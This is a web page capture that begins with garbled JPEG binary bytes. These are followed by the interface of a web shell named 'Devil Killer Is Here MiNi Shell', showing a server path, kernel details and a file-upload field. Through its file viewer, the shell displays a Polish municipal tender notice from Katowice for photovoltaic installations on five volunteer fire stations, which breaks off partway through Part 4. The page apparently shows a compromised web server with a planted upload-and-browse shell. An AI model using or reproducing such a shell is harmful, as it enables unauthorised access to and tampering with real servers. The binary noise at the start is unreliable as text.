JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240126/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240126/0007023801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa, montaż i uruchomienie instalacji fotowoltaicznych dla 5 budynków będących siedzibami OSP w Katowicach. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KOMUNALNY ZAKŁAD GOSPODARKI MIESZKANIOWEJ W KATOWICACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 241031620</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Michała Grażyńskiego 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-126</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@kzgm.katowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kzgm.katowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa, montaż i uruchomienie instalacji fotowoltaicznych dla 5 budynków będących siedzibami OSP w Katowicach. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-916b9dc4-bb79-11ee-b7da-22bd761ba7f3</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00070238</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-01-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00037464/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Montaż instalacji fotowoltaicznych: OSP Dąbrowka Mala, OSP Kostuchna, OSP Podlesie, OSP Szopienice, OSP Zarzecze</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/kzgm_katowice <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/kzgm_katowice</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Informacja o sposobie porozumiewania się Zamawiającego z Wykonawcami, przekazywania dokumentów oraz udzielania wyjaśnień dotyczących treści SWZ - opisane są w Rozdziale XII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje o obowiązkach informacyjnych RODO - opisane są w Rozdziale XXIII SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacja o ograniczeniach stosowania RODO - opisane są w Rozdziale XXIII SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">NZ.231.006.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 564409,15 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa, montaż i uruchomienie instalacji fotowoltaicznej dla budynków Ochotniczej Straży Pożarnej na terenie miasta Katowice. Zamówienie realizowane jest w ramach Programu &#34;EKO REMIZA&#34; finansowanego ze środków Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Katowicach. <br/>Część 1 – OSP Kostuchna ul. Szarych Szeregów 62 obejmuje w szczególności:<br/> 1) montaż konstrukcji wsporczej dla modułów fotowoltaicznych; <br/> 2) montaż modułów fotowoltaicznych (28 paneli o mocy 410 Wp każdy);<br/> 3) montaż falownika fotowoltaicznego i optymalizatorów mocy; <br/> 4) poprowadzenie tras kablowych strony AC i DC. <br/> 5) montaż zabezpieczeń strony AC i DC;<br/> 6) inne czynności niezbędne do prawidłowego i bezpiecznego funkcjonowania instalacji;<br/> 7) wykonanie testów i pomiarów końcowych; <br/> 8) przygotowanie wniosku o zgłoszenie mikroinstalacji do sieci Operatora Sieci Dystrybucyjnej;<br/> 9) wykonanie testowego uruchomienia instalacji fotowoltaicznej; <br/> 10) przeszkolenie przedstawicieli Zamawiającego w zakresie obsługi urządzeń niezbędnych do prawidłowego funkcjonowania instalacji fotowoltaicznej;<br/> 11) serwis gwarancyjny instalacji;<br/> 12) montaż tablicy pamiątkowej;<br/> 13) dwa przeglądy techniczne(roczny i trzyletni) wybudowanych instalacji w okresie gwarancji<br/>UWAGA: Zamówienie nie obejmuje wzmocnienia konstrukcji dachowej. W przypadku konieczności wzmocnienia konstrukcji zostanie udzielone odrębne zamówienie.<br/> 1. Zamawiający wymaga, by do montażu konstrukcji wsporczej dla modułów fotowoltaicznych Wykonawca zastosował rozwiązanie systemowe.<br/> 2. Zamawiający wymaga, by oprogramowanie kontrolno-sterujące wszystkich elementów instalacji miało licencję typu open.<br/> 3. Wymagany przez Zamawiającego okres gwarancji wynosi:<br/> 1) na panele fotowoltaiczne – 15 lat od daty odbioru końcowego przedmiotu umowy , <br/> 3) na inwertery – 10 lat od daty odbioru końcowego przedmiotu umowy, <br/> 5) na pozostałe elementy, materiały , urządzenia i roboty instalacyjno-montażowe – 5 lat daty odbioru końcowego przedmiotu umowy. <br/><br/> Szczegółowy opis przedmiotu zamówienia dla każdej części określają dokumenty zamówienia, w tym:<br/> 1) Projekt techniczny z załącznikami, w tym między innymi Specyfikacją Techniczną Wykonania i Odbioru Robót oraz audytami - Załącznik nr 4 do SWZ, <br/> 2) obmiary robót, odpowiednio dla każdej części - Załącznik nr 5 do SWZ,<br/> 3) projektowane postanowienia umowy – Załącznik nr 3 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 69901,67 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09331200-0 - Słoneczne moduły fotoelektryczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45315700-5 - Instalowanie stacji rozdzielczych</p> <p class="mb-0">45223200-8 - Roboty konstrukcyjne</p> <p class="mb-0">45312310-3 - Ochrona odgromowa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Najkorzystniejsza oferta według kryteriów określonych w SWZ (Rozdział<br/>XVIII &#34;Opis kryteriów oceny ofert i sposobu oceny ofert&#34;)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Wg kolejności</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa, montaż i uruchomienie instalacji fotowoltaicznej dla budynków Ochotniczej Straży Pożarnej na terenie miasta Katowice. Zamówienie realizowane jest w ramach Programu &#34;EKO REMIZA&#34; finansowanego ze środków Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Katowicach. <br/>Część 2 – OSP Szopienice ul. Morawa 119 a obejmuje w szczególności:<br/> 1) montaż konstrukcji wsporczej dla modułów fotowoltaicznych; <br/> 2) montaż modułów fotowoltaicznych (58 paneli o mocy 410 Wp każdy);<br/> 3) montaż falownika fotowoltaicznego i optymalizatorów mocy; <br/> 4) poprowadzenie tras kablowych strony AC i DC. <br/> 5) montaż zabezpieczeń strony AC i DC;<br/> 6) inne czynności niezbędne do prawidłowego i bezpiecznego funkcjonowania instalacji;<br/> 7) wykonanie testów i pomiarów końcowych; <br/> 8) przygotowanie wniosku o zgłoszenie mikroinstalacji do sieci Operatora Sieci Dystrybucyjnej;<br/> 9) wykonanie testowego uruchomienia instalacji fotowoltaicznej; <br/> 10) przeszkolenie przedstawicieli Zamawiającego w zakresie obsługi urządzeń niezbędnych do prawidłowego funkcjonowania instalacji fotowoltaicznej;<br/> 11) serwis gwarancyjny instalacji;<br/> 12) montaż tablicy pamiątkowej;<br/> 13) dwa przeglądy techniczne(roczny i trzyletni) wybudowanych instalacji w okresie gwarancji<br/>UWAGA: Zamówienie nie obejmuje wzmocnienia konstrukcji dachowej. W przypadku konieczności wzmocnienia konstrukcji zostanie udzielone odrębne zamówienie.<br/> 1. Zamawiający wymaga, by do montażu konstrukcji wsporczej dla modułów fotowoltaicznych Wykonawca zastosował rozwiązanie systemowe.<br/>2. Zamawiający wymaga, by oprogramowanie kontrolno-sterujące wszystkich elementów instalacji miało licencję typu open.<br/>3. Wymagany przez Zamawiającego okres gwarancji wynosi:<br/> 1) na panele fotowoltaiczne – 15 lat od daty odbioru końcowego przedmiotu umowy , <br/> 3) na inwertery – 10 lat od daty odbioru końcowego przedmiotu umowy, <br/> 5) na pozostałe elementy, materiały , urządzenia i roboty instalacyjno-montażowe – 5 lat daty odbioru końcowego przedmiotu umowy. <br/><br/> Szczegółowy opis przedmiotu zamówienia dla każdej części określają dokumenty zamówienia, w tym:<br/> 1) Projekt techniczny z załącznikami, w tym między innymi Specyfikacją Techniczną Wykonania i Odbioru Robót oraz audytami - Załącznik nr 4 do SWZ, <br/> 2) obmiary robót, odpowiednio dla każdej części - Załącznik nr 5 do SWZ,<br/> 3) projektowane postanowienia umowy – Załącznik nr 3 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 139403,25 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09331200-0 - Słoneczne moduły fotoelektryczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45315700-5 - Instalowanie stacji rozdzielczych</p> <p class="mb-0">45223200-8 - Roboty konstrukcyjne</p> <p class="mb-0">45312310-3 - Ochrona odgromowa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Najkorzystniejsza oferta według kryteriów określonych w SWZ (Rozdział<br/>XVIII &#34;Opis kryteriów oceny ofert i sposobu oceny ofert&#34;)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Wg kolejności</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa, montaż i uruchomienie instalacji fotowoltaicznej dla budynków Ochotniczej Straży Pożarnej na terenie miasta Katowice. Zamówienie realizowane jest w ramach Programu &#34;EKO REMIZA&#34; finansowanego ze środków Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Katowicach. <br/>Część 3 – OSP Podlesie ul. Uniczowska 64 obejmuje w szczególności:<br/> 1) montaż konstrukcji wsporczej dla modułów fotowoltaicznych; <br/> 2) montaż modułów fotowoltaicznych (38 paneli o mocy 410 Wp każdy);<br/> 3) montaż falownika fotowoltaicznego i optymalizatorów mocy; <br/> 4) poprowadzenie tras kablowych strony AC i DC. <br/> 5) montaż zabezpieczeń strony AC i DC;<br/> 6) inne czynności niezbędne do prawidłowego i bezpiecznego funkcjonowania instalacji;<br/> 7) wykonanie testów i pomiarów końcowych; <br/> 8) przygotowanie wniosku o zgłoszenie mikroinstalacji do sieci Operatora Sieci Dystrybucyjnej;<br/> 9) wykonanie testowego uruchomienia instalacji fotowoltaicznej; <br/> 10) przeszkolenie przedstawicieli Zamawiającego w zakresie obsługi urządzeń niezbędnych do prawidłowego funkcjonowania instalacji fotowoltaicznej;<br/> 11) serwis gwarancyjny instalacji;<br/> 12) montaż tablicy pamiątkowej;<br/> 13) dwa przeglądy techniczne(roczny i trzyletni) wybudowanych instalacji w okresie gwarancji<br/>UWAGA: Zamówienie bejmuje wzmocnienia konstrukcji dachowej zgodnie z opinią techniczną.<br/><br/> 1. Zamawiający wymaga, by do montażu konstrukcji wsporczej dla modułów fotowoltaicznych Wykonawca zastosował rozwiązanie systemowe.<br/> 2. Zamawiający wymaga, by oprogramowanie kontrolno-sterujące wszystkich elementów instalacji miało licencję typu open.<br/> 3. Wymagany przez Zamawiającego okres gwarancji wynosi:<br/> 1) na panele fotowoltaiczne – 15 lat od daty odbioru końcowego przedmiotu umowy , <br/> 3) na inwertery – 10 lat od daty odbioru końcowego przedmiotu umowy, <br/> 5) na pozostałe elementy, materiały , urządzenia i roboty instalacyjno-montażowe – 5 lat daty odbioru końcowego przedmiotu umowy. <br/><br/> Szczegółowy opis przedmiotu zamówienia dla każdej części określają dokumenty zamówienia, w tym:<br/> 1) Projekt techniczny z załącznikami, w tym między innymi Specyfikacją Techniczną Wykonania i Odbioru Robót oraz audytami - Załącznik nr 4 do SWZ, <br/> 2) obmiary robót, odpowiednio dla każdej części - Załącznik nr 5 do SWZ,<br/> 3) projektowane postanowienia umowy – Załącznik nr 3 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 100085,71 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09331200-0 - Słoneczne moduły fotoelektryczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45315700-5 - Instalowanie stacji rozdzielczych</p> <p class="mb-0">45223200-8 - Roboty konstrukcyjne</p> <p class="mb-0">45312310-3 - Ochrona odgromowa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Najkorzystniejsza oferta według kryteriów określonych w SWZ (Rozdział<br/>XVIII &#34;Opis kryteriów oceny ofert i sposobu oceny ofert&#34;)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Wg kolejności</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa, montaż i uruchomienie instalacji fotowoltaicznej dla budynków Ochotniczej Straży Pożarnej na terenie miasta Katowice. Zamówienie realizowane jest w ramach Programu &#34;EKO REMIZA&#34; finansowanego ze środków Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Katowicach. <br/>Część 4 – OSP Dąbrówka Mała ul. Strzelców Bytomskich 33 obejmuje w szczególności:<br/> 1) montaż konstrukcji wsporczej dla modułów fotowoltaicznych; <br/> 2) montaż modułów fotowoltaicznych (70 paneli o mocy 410 Wp każdy);<br/> 3) montaż falownika fotowoltaicznego i optymalizatorów mocy; <br/> 4) poprowadzenie tras kablowych strony AC i DC. <br/> 5) montaż zabezpieczeń strony AC i DC;<br/> 6) inne czynności niezbędne do prawidłowego i bezpiecznego funkcjonowania instalacji;<br/> 7) wykonanie testów i pomiarów końcowych; <br/> 8) przygotowanie wniosku o zgłoszenie mikroinstalacji do sieci Operatora Sieci Dystrybucyjnej;<br/> 9) wykonanie testowego uruchomienia instalacji fotowoltaicznej; <br/> 10) przeszkolenie przedstawicieli Zamawiającego w zakresie obsługi urządzeń niezbędnych do prawidłowego funkcjonowania instalacji fotowoltaicznej;<br/> 11) serwis gwarancyjny instalacji;<br/> 12) montaż tablicy pamiątkowej;<br/> 13) dwa przeglądy techniczne(roczny i trzyletni) wybudowanych instalacji w okresie gwarancji.<br/>UWAGA: Zamówienie nie obejmuje wzmocnienia konstrukcji dachowej, które zgodnie z opinią techniczną nie jest wymagane.<br/> 1. Zamawiający wymaga, by do montażu konstrukcji wsporczej dla modułów fotowoltaicznych Wykonawca zastosował rozwiązanie systemowe.<br/> 2. Zamawiający wymaga, by oprogramowanie kontrolno-sterujące wszystkich elementów instalacji miało licencję typu open.<br/> 3. Wymagany przez Zamawiającego okres gwarancji wynosi:<br/> 1) na panele fotowoltaiczne – 15 lat od daty odbioru końcowego przedmiotu umowy , <br/> 3) na inwertery – 10 lat od daty odbioru końcowego przedmiotu umowy, <br/> 5) na pozostałe elementy, materiały , urządzenia i roboty instalacyjno-montażowe – 5 lat daty odbioru końcowego przedmiotu umowy. <br/><br/> Szczegółowy opis przedmiotu zamówienia dla każdej części określają dokumenty zamówienia, w tym:<br/> 1) Projekt techniczny z załącznikami, w tym między innymi Specyfikacją Techniczną Wykonania i Odbioru Robót 